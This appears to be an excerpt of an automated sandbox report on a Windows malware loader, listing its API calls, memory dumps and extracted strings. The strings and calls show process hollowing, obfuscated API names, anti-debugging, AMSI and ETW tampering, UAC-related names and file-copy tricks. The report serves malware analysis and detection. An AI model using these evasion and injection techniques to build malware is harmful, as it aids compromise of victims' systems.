                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                              • API String ID: 2521977463-737317276
                                                                                              • Opcode ID: 48f23c1a16f24d381f6567b6fb4cda7d6595ddbfc0c93b79485eba3f48d7a41d
                                                                                              • Instruction ID: 4d4735fa2927d1a05726e44e6775e831b271ab7eb3e1a385538a9ecf88a9fde4
                                                                                              • Opcode Fuzzy Hash: 48f23c1a16f24d381f6567b6fb4cda7d6595ddbfc0c93b79485eba3f48d7a41d
                                                                                              • Instruction Fuzzy Hash: 72012979214348AFDB15EFA9EC51E9EBBACEB4EA00F518464F914DB641DB34A9008B24
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                              • API String ID: 2719805696-3542721025
                                                                                              • Opcode ID: 218d2faa62a9ca11a96c46d621b8c613bbae424d667d2f6d97a5087e05dc403f
                                                                                              • Instruction ID: 7334c7630e839f5539f71adafa818d2e732c30a5379ceeed01369f5f8a77b15e
                                                                                              • Opcode Fuzzy Hash: 218d2faa62a9ca11a96c46d621b8c613bbae424d667d2f6d97a5087e05dc403f
                                                                                              • Instruction Fuzzy Hash: C7015E79214348AFCB01EF99EC55E9EBBECEB4EA00F508464B810DB680DB30ED14CB64
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                              • API String ID: 3503870465-2520021413
                                                                                              • Opcode ID: b515a9ef0e3938b5cd828536d1ea47e14434c8af810e93155a8dd448fab97c23
                                                                                              • Instruction ID: 4693b60449f3c4cd5ee648149d261513dfb277ee783eadf733ad39ae6ff51acd
                                                                                              • Opcode Fuzzy Hash: b515a9ef0e3938b5cd828536d1ea47e14434c8af810e93155a8dd448fab97c23
                                                                                              • Instruction Fuzzy Hash: 66016D3D614348AFDB05EFA9EC51E5EBBADEB4EA10F918465B8109B640EB34A900C664
                                                                                              APIs
                                                                                              • RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$DeleteFileNameName_
                                                                                              • String ID:
                                                                                              • API String ID: 4284456518-0
                                                                                              • Opcode ID: 7a5a20eee3082041f2813f2df9c7e296f23d9062c2f44950058c4b931404ae9b
                                                                                              • Instruction ID: 9d7bc23f6756bd9ebe54ab9a09901fdf10b5aae966dadb23aecca9d989aec539
                                                                                              • Opcode Fuzzy Hash: 7a5a20eee3082041f2813f2df9c7e296f23d9062c2f44950058c4b931404ae9b
                                                                                              • Instruction Fuzzy Hash: 620162799443486FEB05EBA0AD91FDDB7BCAF4A704F514496D200EA081DBB4AB048725
                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                                • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                              • String ID:
                                                                                              • API String ID: 1530111750-0
                                                                                              • Opcode ID: 4f0c81381db166d79dfe8ec0a1fe8d755a97cb58f718d8ba0dc793f12d131b6c
                                                                                              • Instruction ID: 7d132b2384d7956405f185e1db58b3addd88bcf6d6b187c677df85b524acf2f1
                                                                                              • Opcode Fuzzy Hash: 4f0c81381db166d79dfe8ec0a1fe8d755a97cb58f718d8ba0dc793f12d131b6c
                                                                                              • Instruction Fuzzy Hash: DE012C7595430CBFDB11EBA4ED52FDDB3BCEB4E604F5144A5E200E6180EBB4AB048664
                                                                                              APIs
                                                                                                • Part of subcall function 031D6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,031D6DB9,?,?,?,00000000), ref: 031D6D99
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,031D6EAC,00000000,00000000,031D6E2B,?,00000000,031D6E9B), ref: 031D6E17
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromInstanceProg
                                                                                              • String ID:
                                                                                              • API String ID: 2151042543-0
                                                                                              • Opcode ID: 539583ae73e7a44170ac7b5b1fcc5a640aa71a8e8c40b4a66581d1927e2e5a3b
                                                                                              • Instruction ID: 1fbfbd7045470d820d61e77907ec3c4239da9daec8a843ed75485f19d7f88c66
                                                                                              • Opcode Fuzzy Hash: 539583ae73e7a44170ac7b5b1fcc5a640aa71a8e8c40b4a66581d1927e2e5a3b
                                                                                              • Instruction Fuzzy Hash: F5012635208704AFD715EFA1DC2286FBBBCE74EB00F920839F404E2680EB306D20C4A4
                                                                                              APIs
                                                                                              • InetIsOffline.URL(00000000,00000000,031EB784,?,?,?,00000000,00000000), ref: 031DF801
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031DF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,031DFAEB,UacInitialize,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize), ref: 031DF6EE
                                                                                                • Part of subcall function 031DF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031DF700
                                                                                                • Part of subcall function 031DF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 031DF754
                                                                                                • Part of subcall function 031DF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
                                                                                                • Part of subcall function 031DF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031DF77D
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031CC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0333B8B8,?,031E0751,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession), ref: 031CC37B
                                                                                                • Part of subcall function 031DDD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDAB
                                                                                                • Part of subcall function 031DDD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDDB
                                                                                                • Part of subcall function 031DDD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 031DDDF0
                                                                                                • Part of subcall function 031DDD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 031DDE1C
                                                                                                • Part of subcall function 031DDD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 031DDE25
                                                                                                • Part of subcall function 031C7E80: GetFileAttributesA.KERNEL32(00000000,?,031E356F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,Initialize), ref: 031C7E8B
                                                                                                • Part of subcall function 031C8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,031E370D,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize,03247380,031EB7B8,ScanString,03247380,031EB7B8), ref: 031C8055
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                              • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                              • API String ID: 297057983-2644593349
                                                                                              • Opcode ID: b223cbff77265a38e381ce7f3f885762f0a343e89113fc99ac5b1eafacb04ee2
                                                                                              • Instruction ID: c41d9fc9d297105ec49f1a43e93ab3e88f9f0fb026c542dadb42649bd13a7dae
                                                                                              • Opcode Fuzzy Hash: b223cbff77265a38e381ce7f3f885762f0a343e89113fc99ac5b1eafacb04ee2
                                                                                              • Instruction Fuzzy Hash: 7314FC3DA1C26C8FCB12EB65DC90ACE73B5EB9D700F5080A99149AF654DF31AE818F51

                                                                                              Control-flow Graph
                                                                                              [Control-flow graph image omitted. The graph text covers basic blocks 31e8128 through 31eb2fa, consisting of repeated chains of calls to internal functions (31c4860, 31c49a0, 31c46d4, 31c47ec, 31d89d0 and others) interleaved with calls to the Windows APIs CreateProcessAsUserW, ResumeThread, CloseHandle and ExitProcess. Legend: Executed / Not Executed.]
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0333B7E0,0333B824,OpenSession,03247380,031EB7B8,UacScan,03247380), ref: 031E86E9
                                                                                              • ResumeThread.KERNEL32(00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8), ref: 031E8D33
                                                                                              • CloseHandle.KERNEL32(00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,00000000,ScanBuffer,03247380,031EB7B8,OpenSession,03247380), ref: 031E8EB2
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,03247380,031EB7B8,UacInitialize,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380), ref: 031E92A4
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031DDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                                • Part of subcall function 031DDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                                • Part of subcall function 031DDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                                • Part of subcall function 031DDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                                • Part of subcall function 031D8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,Initialize,03247380,031EB7B8,00000000,00000000,00000000,ScanString,03247380,031EB7B8), ref: 031EB2FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                              • API String ID: 2769005614-3738268246
                                                                                              • Opcode ID: df1dcc0d4e472fa12915e057e6475529579958e048ad8ec7fe9602a8ebf9a43f
                                                                                              • Instruction ID: f22566b21af5e86cc2b60090cb297645bfe2a1ce4fb359d7293543d7b9e34b9b
                                                                                              • Opcode Fuzzy Hash: df1dcc0d4e472fa12915e057e6475529579958e048ad8ec7fe9602a8ebf9a43f
                                                                                              • Instruction Fuzzy Hash: A643FD3DA1C66C8FCB12EB65DC909CE73B5EB9D700F1080A9A149AF654DF31AE918F41
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031DDC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                                • Part of subcall function 031DDC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                                • Part of subcall function 031DDC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                                • Part of subcall function 031DDC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03247380,031EB7B8,UacScan,03247380,031EB7B8,ScanString,03247380,031EB7B8,031EBB30,00000000,00000000,031EBB24,00000000,00000000), ref: 031E40CB
                                                                                                • Part of subcall function 031D88B8: LoadLibraryW.KERNEL32(amsi), ref: 031D88C1
                                                                                                • Part of subcall function 031D88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031D8920
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacScan,03247380,031EB7B8,000003E8,ScanBuffer,03247380,031EB7B8,UacScan,03247380), ref: 031E4277
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • Sleep.KERNEL32(00004E20,UacScan,03247380,031EB7B8,ScanString,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,UacInitialize,03247380,031EB7B8), ref: 031E50EE
                                                                                                • Part of subcall function 031DDC04: RtlI.N(?,?,00000000,031DDC7E), ref: 031DDC2C
                                                                                                • Part of subcall function 031DDC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC42
                                                                                                • Part of subcall function 031DDC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,031DDC7E), ref: 031DDC61
                                                                                                • Part of subcall function 031C7E5C: GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                                • Part of subcall function 031D85BC: WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
